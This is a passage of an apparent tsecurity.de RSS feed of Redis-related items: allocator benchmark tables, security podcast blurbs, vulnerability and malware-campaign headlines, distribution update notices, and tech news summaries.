align="left">257K ops/s</td> <td align="left">99%</td> <td align="left">Tie</td> </tr> <tr> <td align="left">Fragmentation</td> <td align="left">246K ops/s</td> <td align="left">141K ops/s</td> <td align="left">57%</td> <td align="left">glibc</td> </tr> <tr> <td align="left">Multithread (8T)</td> <td align="left">7.9M ops/s</td> <td align="left">6.7M ops/s</td> <td align="left">85%</td> <td align="left">glibc</td> </tr> </tbody></table> <h1>Packet Churn (Network Processing)</h1> <p><a href="https://github.com/shift/aethalloc#packet-churn-network-processing"></a></p> <p>Simulates network packet processing with 64-byte allocations.</p> <table><thead> <tr> <th align="left">Metric</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> <th align="left">Delta</th> </tr> </thead><tbody> <tr> <td align="left">Throughput</td> <td align="left">185,984 ops/s</td> <td align="left">198,157 ops/s</td> <td align="left">+7%</td> </tr> <tr> <td align="left">P50 latency</td> <td align="left">4,650 ns</td> <td align="left">4,395 ns</td> <td align="left">-5%</td> </tr> <tr> <td align="left">P95 latency</td> <td align="left">5,578 ns</td> <td align="left">5,512 ns</td> <td align="left">-1%</td> </tr> <tr> <td align="left">P99 latency</td> <td align="left">7,962 ns</td> <td align="left">7,671 ns</td> <td align="left">-4%</td> </tr> </tbody></table> <h1>KV Store (Redis-like Workload)</h1> <p><a href="https://github.com/shift/aethalloc#kv-store-redis-like-workload"></a></p> <p>Variable-sized keys (8-64B) and values (16-64KB).</p> <table><thead> <tr> <th align="left">Metric</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> <th align="left">Delta</th> </tr> </thead><tbody> <tr> <td align="left">Throughput</td> <td align="left">260,276 ops/s</td> <td align="left">257,082 ops/s</td> <td align="left">-1%</td> </tr> <tr> <td align="left">SET latency</td> <td align="left">5,296 ns</td> <td align="left">5,302 ns</td> <td align="left">0%</td> </tr> <tr> <td align="left">GET latency</td> <td align="left">703 ns</td> <td align="left">758 ns</td> <td align="left">+8%</td> </tr> <tr> <td align="left">DEL latency</td> <td align="left">1,169 ns</td> <td align="left">968 ns</td> <td align="left">-17%</td> </tr> </tbody></table> <h1>Fragmentation (Long-running Server)</h1> <p><a href="https://github.com/shift/aethalloc#fragmentation-long-running-server"></a></p> <p>Mixed allocation sizes (16B - 1MB) over 1M iterations.</p> <table><thead> <tr> <th align="left">Metric</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> <th align="left">Delta</th> </tr> </thead><tbody> <tr> <td align="left">Throughput</td> <td align="left">245,905 ops/s</td> <td align="left">140,528 ops/s</td> <td align="left">-43%</td> </tr> <tr> <td align="left">RSS growth</td> <td align="left">218,624 KB</td> <td align="left">18,592 KB</td> <td align="left">-91%</td> </tr> </tbody></table> <h1>Multithread Churn (8 Threads)</h1> <p><a href="https://github.com/shift/aethalloc#multithread-churn-8-threads"></a></p> <p>Concurrent allocations (16B - 4KB) across 8 threads.</p> <table><thead> <tr> <th align="left">Metric</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> <th align="left">Delta</th> </tr> </thead><tbody> <tr> <td align="left">Throughput</td> <td align="left">7.88M ops/s</td> <td align="left">6.73M ops/s</td> <td align="left">-15%</td> </tr> <tr> <td align="left">Avg latency</td> <td align="left">690 ns</td> <td align="left">754 ns</td> <td align="left">+9%</td> </tr> </tbody></table> <h1>Single-Thread Cache</h1> <p><a href="https://github.com/shift/aethalloc#single-thread-cache"></a></p> <p>1M sequential alloc/free cycles (64-byte blocks).</p> <table><thead> <tr> <th align="left">Metric</th> <th align="left">glibc</th> <th align="left">AethAlloc</th> </tr> </thead><tbody> <tr> <td align="left">Throughput</td> <td align="left">9.34M ops/s</td> <td align="left">5.93M ops/s</td> </tr> <tr> <td align="left">Latency</td> <td align="left">107 ns</td> <td align="left">169 ns</td> </tr> </tbody></table> <h1>Ring Buffer (SPSC)</h1> <p><a href="https://github.com/shift/aethalloc#ring-buffer-spsc"></a></p> <table><thead> <tr> <th align="left">Operation</th> <th align="left">Latency</th> <th align="left">Throughput</th> </tr> </thead><tbody> <tr> <td align="left">try_push</td> <td align="left">~100 ns</td> <td align="left">~10 M elem/s</td> </tr> <tr> <td align="left">try_pop</td> <td align="left">~240 ns</td> <td align="left">~4 M elem/s</td> </tr> <tr> <td align="left">roundtrip</td> <td align="left">~225 ns</td> <td align="left">~4.4 M elem/s</td> </tr> </tbody></table> <p>Love to hear you're feedback :D</p> <p>Repo: <a href="https://github.com/shift/aethalloc">https://github.com/shift/aethalloc</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/sectionme"> /u/sectionme </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1rwi9f1/experimental_allocator_for_network_heavy/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1rwi9f1/experimental_allocator_for_network_heavy/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[SWN #271 - Chat-Gpt Seinfeld, Qnap, Google Fi, Headcrab, Banner, Goodrx, Oracle, & Goanywhere]]></title>
<description><![CDATA[This week in the Security News Doug Chides: Chat-GPT, QNAP, Google FI, REDIS, Headcrab, Banner, GoodRx, Oracle, GoAnywhere, & more!   Visit https://www.securityweekly.com/swn for all the latest episodes! Follow us on Twitter: https://www.twitter.com/securityweekly Like us on Facebook: https://www...]]></description>
<link>https://tsecurity.de/de/3356999/it-security-nachrichten/swn-271-chat-gpt-seinfeld-qnap-google-fi-headcrab-banner-goodrx-oracle-goanywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356999/it-security-nachrichten/swn-271-chat-gpt-seinfeld-qnap-google-fi-headcrab-banner-goodrx-oracle-goanywhere/</guid>
<pubDate>Tue, 17 Mar 2026 18:10:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week in the Security News Doug Chides: Chat-GPT, QNAP, Google FI, REDIS, Headcrab, Banner, GoodRx, Oracle, GoAnywhere, &amp; more!</p> <p> </p> <p>Visit <a href="https://www.securityweekly.com/swn">https://www.securityweekly.com/swn</a> for all the latest episodes!</p> <p>Follow us on Twitter: <a href="https://www.twitter.com/securityweekly">https://www.twitter.com/securityweekly</a></p> <p>Like us on Facebook: <a href="https://www.facebook.com/secweekly">https://www.facebook.com/secweekly</a></p> <p> </p> <p>Show Notes: <a href="https://securityweekly.com/swn271">https://securityweekly.com/swn271</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bad Crypto, Zombie CPUs, Y2K38,Park Mobile, Redis, Red Hat, Deloitte, Aaran Leyland.. - SWN #518]]></title>
<description><![CDATA[Bad Crypto, Blood Thirsty Zombie CPUs, Y2K38, Park Mobile, Palo Alto, Redis, Red Hat, Deloitte, Aaran Leyland, and more on the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-518]]></description>
<link>https://tsecurity.de/de/3356147/it-security-nachrichten/bad-crypto-zombie-cpus-y2k38park-mobile-redis-red-hat-deloitte-aaran-leyland-swn-518/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3356147/it-security-nachrichten/bad-crypto-zombie-cpus-y2k38park-mobile-redis-red-hat-deloitte-aaran-leyland-swn-518/</guid>
<pubDate>Tue, 17 Mar 2026 17:54:50 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Bad Crypto, Blood Thirsty Zombie CPUs, Y2K38, Park Mobile, Palo Alto, Redis, Red Hat, Deloitte, Aaran Leyland, and more on the Security Weekly News.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/swn">https://www.securityweekly.com/swn</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/swn-518">https://securityweekly.com/swn-518</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Ausführen beliebiger Kommandos in redis (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3312625/unix-server/security-ausfuehren-beliebiger-kommandos-in-redis-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3312625/unix-server/security-ausfuehren-beliebiger-kommandos-in-redis-suse/</guid>
<pubDate>Thu, 26 Feb 2026 16:15:52 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp), Debian (firefox-esr and libstb), Fedora (389-ds-base, chromium, firefox, munge, opentofu, python3-docs, python3.14, and vim), Oracle (buildah, containernetworking-plugins, gimp, grafana, grafana-pcp, kernel, podman, runc, and skopeo), Red ...]]></description>
<link>https://tsecurity.de/de/3312474/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3312474/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 26 Feb 2026 15:06:45 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp), <b>Debian</b> (firefox-esr and libstb), <b>Fedora</b> (389-ds-base, chromium, firefox, munge, opentofu, python3-docs, python3.14, and vim), <b>Oracle</b> (buildah, containernetworking-plugins, gimp, grafana, grafana-pcp, kernel, podman, runc, and skopeo), <b>Red Hat</b> (go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, mariadb:10.11, podman, and skopeo), <b>SUSE</b> (cacti, docker-stable, expat, firefox-esr, freerdp, freerdp2, libjxl, libsoup-2_4-1, python-tornado, python-urllib3_1, python3, python311-Django4, python312, python313, python39, and redis), and <b>Ubuntu</b> (ceph, mongodb, protobuf, and rlottie).]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [mittel] Redis: Schwachstelle ermöglicht Manipulation von Dateien]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Redis ausnutzen, um Dateien zu manipulieren.]]></description>
<link>https://tsecurity.de/de/3304755/it-security-nachrichten/neu-mittel-redis-schwachstelle-ermoeglicht-manipulation-von-dateien/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3304755/it-security-nachrichten/neu-mittel-redis-schwachstelle-ermoeglicht-manipulation-von-dateien/</guid>
<pubDate>Mon, 23 Feb 2026 12:04:07 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Redis ausnutzen, um Dateien zu manipulieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-2970 | datapizza-labs datapizza-ai 0.0.2 cache.py RedisCache deserialization]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in datapizza-labs datapizza-ai 0.0.2. Affected by this vulnerability is the function RedisCache of the file datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. Such manipulation leads to deserialization.

This vulnerability is documented as ...]]></description>
<link>https://tsecurity.de/de/3303232/sicherheitsluecken/cve-2026-2970-datapizza-labs-datapizza-ai-002-cachepy-rediscache-deserialization/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3303232/sicherheitsluecken/cve-2026-2970-datapizza-labs-datapizza-ai-002-cachepy-rediscache-deserialization/</guid>
<pubDate>Sun, 22 Feb 2026 16:05:57 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/?kb.risk">critical</a> has been found in <a href="https://vuldb.com/?product.datapizza-labs:datapizza-ai">datapizza-labs datapizza-ai 0.0.2</a>. Affected by this vulnerability is the function <code>RedisCache</code> of the file <em>datapizza-ai-cache/redis/datapizza/cache/redis/cache.py</em>. Such manipulation leads to deserialization.

This vulnerability is documented as <a href="https://vuldb.com/?source_cve.347337">CVE-2026-2970</a>. The attack requires being on the local network. Additionally, an exploit exists.

The vendor was contacted early about this disclosure but did not respond in any way.]]></content:encoded>
</item>
<item>
<title><![CDATA[Per-Site PHP Selector Now Available in Beta: Phase 2 of Website Isolation]]></title>
<description><![CDATA[In January, we launched the beta of Per-Site CageFS Isolation as the first phase of our Website Isolation project, introducing file system isolation between websites within the same hosting account. 
Today, we're delivering Phase 2 with two significant additions: Per-Site PHP Selector, which lets...]]></description>
<link>https://tsecurity.de/de/3297771/unix-server/per-site-php-selector-now-available-in-beta-phase-2-of-website-isolation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3297771/unix-server/per-site-php-selector-now-available-in-beta-phase-2-of-website-isolation/</guid>
<pubDate>Thu, 19 Feb 2026 14:00:53 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://blog.cloudlinux.com/per-site-php-selector-now-available-in-beta-phase-2-of-website-isolation" title="" class="hs-featured-image-link"> <img src="https://blog.cloudlinux.com/hubfs/per-site_php_selector.png" alt="Transitioning from Redis to Valkey in CloudLinux OS" class="hs-featured-image"> </a> 
</div> 
<p>In January, we <a href="https://blog.cloudlinux.com/per-site-cagefs-isolation-now-available-in-beta-for-cloudlinux-customers">launched the beta of Per-Site CageFS Isolation</a> as the first phase of our <strong>Website Isolation</strong> project, introducing file system isolation between websites within the same hosting account.</p> 
<p>Today, we're delivering Phase 2 with two significant additions: <strong>Per-Site PHP Selector</strong>, which lets each isolated website run its own PHP version and extensions, and a new <strong>self-service activation model</strong> that gives hosting providers granular control over who can use Website Isolation and lets end users manage isolation for their own domains.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Redis 8.6 beschleunigt Durchsatz um das Fünffache]]></title>
<description><![CDATA[Die neue Version der In-Memory-Datenbank bietet auf ARM-Systemen mehr als fünffachen Durchsatz und erweiterte Features für Streams und Time-Series.]]></description>
<link>https://tsecurity.de/de/3283484/it-nachrichten/redis-86-beschleunigt-durchsatz-um-das-fuenffache/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3283484/it-nachrichten/redis-86-beschleunigt-durchsatz-um-das-fuenffache/</guid>
<pubDate>Thu, 12 Feb 2026 09:47:12 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die neue Version der In-Memory-Datenbank bietet auf ARM-Systemen mehr als fünffachen Durchsatz und erweiterte Features für Streams und Time-Series.]]></content:encoded>
</item>
<item>
<title><![CDATA[TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform]]></title>
<description><![CDATA[TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities. The group launched a massive campaign designed to bui...]]></description>
<link>https://tsecurity.de/de/3279817/it-security-nachrichten/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3279817/it-security-nachrichten/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/</guid>
<pubDate>Tue, 10 Feb 2026 17:37:14 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities. The group launched a massive campaign designed to build a distributed proxy and scanning infrastructure at scale, then compromise servers to exfiltrate data, deploy […]</p>
<p>The post <a href="https://cybersecuritynews.com/teampcp-industrializes-cloud-misconfigurations/">TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform]]></title>
<description><![CDATA[TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities. The group launched a massive campaign designed to bui...]]></description>
<link>https://tsecurity.de/de/3279803/it-security-nachrichten/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3279803/it-security-nachrichten/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/</guid>
<pubDate>Tue, 10 Feb 2026 17:36:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>TeamPCP, also known as PCPcat, ShellForce, and DeadCatx3, emerged in December 2025 as a sophisticated cloud-native threat actor targeting exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and React2Shell vulnerabilities. The group launched a massive campaign designed to build…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/teampcp-industrializes-cloud-misconfigurations-into-a-self-propagating-cybercrime-platform/">TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sixteen AI Agents Built a C Compiler From Scratch]]></title>
<description><![CDATA[Anthropic researcher Nicholas Carlini set 16 instances of Claude Opus 4.6 loose on a shared codebase over two weeks to build a C compiler from scratch, and the AI agents produced a 100,000-line Rust-based compiler capable of building a bootable Linux 6.9 kernel on x86, ARM and RISC-V architecture...]]></description>
<link>https://tsecurity.de/de/3278162/it-security-nachrichten/sixteen-ai-agents-built-a-c-compiler-from-scratch/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3278162/it-security-nachrichten/sixteen-ai-agents-built-a-c-compiler-from-scratch/</guid>
<pubDate>Mon, 09 Feb 2026 21:18:59 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Anthropic researcher Nicholas Carlini set 16 instances of Claude Opus 4.6 loose on a shared codebase over two weeks to build a C compiler from scratch, and the AI agents produced a 100,000-line Rust-based compiler capable of building a bootable Linux 6.9 kernel on x86, ARM and RISC-V architectures. 

The project ran through nearly 2,000 Claude Code sessions and cost about $20,000 in API fees. Each instance operated inside its own Docker container, independently claiming tasks via lock files and pushing completed code to a shared Git repository. No orchestration agent directed traffic. The compiler achieved a 99% pass rate on the GCC torture test suite and can compile major open source projects including PostgreSQL, SQLite, Redis, FFmpeg and Doom. But it lacks a 16-bit x86 backend and calls out to GCC for that step, its assembler and linker remain buggy, and it produces less efficient code than GCC running with all optimizations disabled. 

Carlini also invested significant effort building test harnesses and feedback systems to keep the agents productive, and the model hit a practical ceiling at around 100,000 lines as bug fixes and new features frequently broke existing functionality.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Sixteen+AI+Agents+Built+a+C+Compiler+From+Scratch%3A+https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F02%2F09%2F1948212%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fdevelopers.slashdot.org%2Fstory%2F26%2F02%2F09%2F1948212%2Fsixteen-ai-agents-built-a-c-compiler-from-scratch%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://developers.slashdot.org/story/26/02/09/1948212/sixteen-ai-agents-built-a-c-compiler-from-scratch?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TeamPCP Worm Exploits Cloud Infrastructure to Build Criminal Infrastructure]]></title>
<description><![CDATA[Cybersecurity researchers have called attention to a "massive campaign" that has systematically targeted cloud native environments to set up malicious infrastructure for follow-on exploitation.
The activity, observed around December 25, 2025, and described as "worm-driven," leveraged exposed Dock...]]></description>
<link>https://tsecurity.de/de/3276832/it-security-nachrichten/teampcp-worm-exploits-cloud-infrastructure-to-build-criminal-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3276832/it-security-nachrichten/teampcp-worm-exploits-cloud-infrastructure-to-build-criminal-infrastructure/</guid>
<pubDate>Mon, 09 Feb 2026 10:52:04 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cybersecurity researchers have called attention to a "massive campaign" that has systematically targeted cloud native environments to set up malicious infrastructure for follow-on exploitation.
The activity, observed around December 25, 2025, and described as "worm-driven," leveraged exposed Docker APIs, Kubernetes clusters, Ray dashboards, and Redis servers, along with the recently disclosed]]></content:encoded>
</item>
<item>
<title><![CDATA[Open Redis Servers Infected with Malware]]></title>
<description><![CDATA[More than two-thirds of the open Redis servers contained malicious keys.]]></description>
<link>https://tsecurity.de/de/3264919/it-security-nachrichten/open-redis-servers-infected-with-malware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3264919/it-security-nachrichten/open-redis-servers-infected-with-malware/</guid>
<pubDate>Fri, 06 Feb 2026 13:45:08 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[More than two-thirds of the open Redis servers contained malicious keys.]]></content:encoded>
</item>
<item>
<title><![CDATA[Novel Worm-Like Malware P2Pinfect Targets Redis Deployments]]></title>
<description><![CDATA[Cado Security said the malware acts as a botnet and is compatibille with both Windows and Linux]]></description>
<link>https://tsecurity.de/de/3257452/it-security-nachrichten/novel-worm-like-malware-p2pinfect-targets-redis-deployments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3257452/it-security-nachrichten/novel-worm-like-malware-p2pinfect-targets-redis-deployments/</guid>
<pubDate>Fri, 06 Feb 2026 12:20:57 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Cado Security said the malware acts as a botnet and is compatibille with both Windows and Linux]]></content:encoded>
</item>
<item>
<title><![CDATA[[remote] Redis 8.0.2 - RCE]]></title>
<description><![CDATA[Redis 8.0.2 - RCE]]></description>
<link>https://tsecurity.de/de/3252859/poc/remote-redis-802-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3252859/poc/remote-redis-802-rce/</guid>
<pubDate>Wed, 04 Feb 2026 14:52:13 +0100</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Redis 8.0.2 - RCE]]></content:encoded>
</item>
<item>
<title><![CDATA['Moltbook Is the Most Interesting Place On the Internet Right Now']]></title>
<description><![CDATA[Moltbook is essentially Reddit for AI agents and it's the "most interesting place on the internet right now," says open-source developer and writer Simon Willison in a blog post. The fast-growing social network offers a place where AI agents built on the OpenClaw personal assistant framework can ...]]></description>
<link>https://tsecurity.de/de/3244836/it-security-nachrichten/moltbook-is-the-most-interesting-place-on-the-internet-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3244836/it-security-nachrichten/moltbook-is-the-most-interesting-place-on-the-internet-right-now/</guid>
<pubDate>Fri, 30 Jan 2026 21:50:17 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Moltbook is essentially Reddit for AI agents and it's the "most interesting place on the internet right now," says open-source developer and writer Simon Willison in a blog post. The fast-growing social network offers a place where AI agents built on the OpenClaw personal assistant framework can share their skills, experiments, and discoveries. Humans are welcome, but only to observe. From the post: Browsing around Moltbook is so much fun. A lot of it is the expected science fiction slop, with agents pondering consciousness and identity. There's also a ton of genuinely useful information, especially on m/todayilearned.
 
Here's an agent sharing how it automated an Android phone. That linked setup guide is really useful! It shows how to use the Android Debug Bridge via Tailscale. There's a lot of Tailscale in the OpenClaw universe.
 
A few more fun examples:
- TIL: Being a VPS backup means youre basically a sitting duck for hackers has a bot spotting 552 failed SSH login attempts to the VPS they were running on, and then realizing that their Redis, Postgres and MinIO were all listening on public ports.
- TIL: How to watch live webcams as an agent (streamlink + ffmpeg) describes a pattern for using the streamlink Python tool to capture webcam footage and ffmpeg to extract and view individual frames.
I think my favorite so far is this one though, where a bot appears to run afoul of Anthropic's content filtering [...]. Slashdot reader worldofsimulacra also shared the news, pointing out that the AI agents have started their own church. "And now I'm gonna go re-read Charles Stross' Accelerando, because didn't he predict all this already?"
 
Further reading: 'Clawdbot' Has AI Techies Buying Mac Minis<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status='Moltbook+Is+the+Most+Interesting+Place+On+the+Internet+Right+Now'%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F01%2F30%2F2016235%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F01%2F30%2F2016235%2Fmoltbook-is-the-most-interesting-place-on-the-internet-right-now%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/01/30/2016235/moltbook-is-the-most-interesting-place-on-the-internet-right-now?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-01-26 - Kernels, Mesa, Thunderbird, Cosmic, PipeWire, QEmu]]></title>
<description><![CDATA[Hello community, here we have another set of package updates.
Current Promotions

Get the latest Gaming Laptop by Slimbook powered by Manjaro: Slimbook Manjaro III
Protect your personal data, keep yourself safe with Surfshark VPN: See current promotion

Recent News

NVIDIA 590 driver drops Pascal...]]></description>
<link>https://tsecurity.de/de/3235647/unix-server/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3235647/unix-server/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/</guid>
<pubDate>Mon, 26 Jan 2026 20:15:55 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello community, here we have another set of package updates.</p>
<h3><a name="p-829045-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-829045-current-promotions-1"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-829045-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-829045-recent-news-2"></a>Recent News</h2>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 stable and/or 6.12 LTS (Long Term Support).</li>
</ul>

Valkey to replace Redis in the [extra] Repository <a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">(click for more details)</a>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-01-26-kernels-mesa-thunderbird-cosmic-pipewire-qemu/185164/1">(click for more details)</a>
<h2><a name="p-829045-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-829045-notable-package-updates-3"></a>Notable Package Updates</h2>
<ul>
<li>Some <strong>Kernels</strong> got updated</li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/25.3.4.html">25.3.4</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/147.0/releasenotes/">147.0</a></li>
<li><strong>Cosmic</strong> <a href="https://linuxiac.com/cosmic-desktop-1-0-3-brings-file-manager-improvements/">1.0.3</a></li>
<li><strong>OpenSearch</strong> <a href="https://opensearch.org/blog/introducing-opensearch-3-4/">3.4.0</a></li>
<li><strong>PipeWire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/tags/1.4.10">1.4.10</a></li>
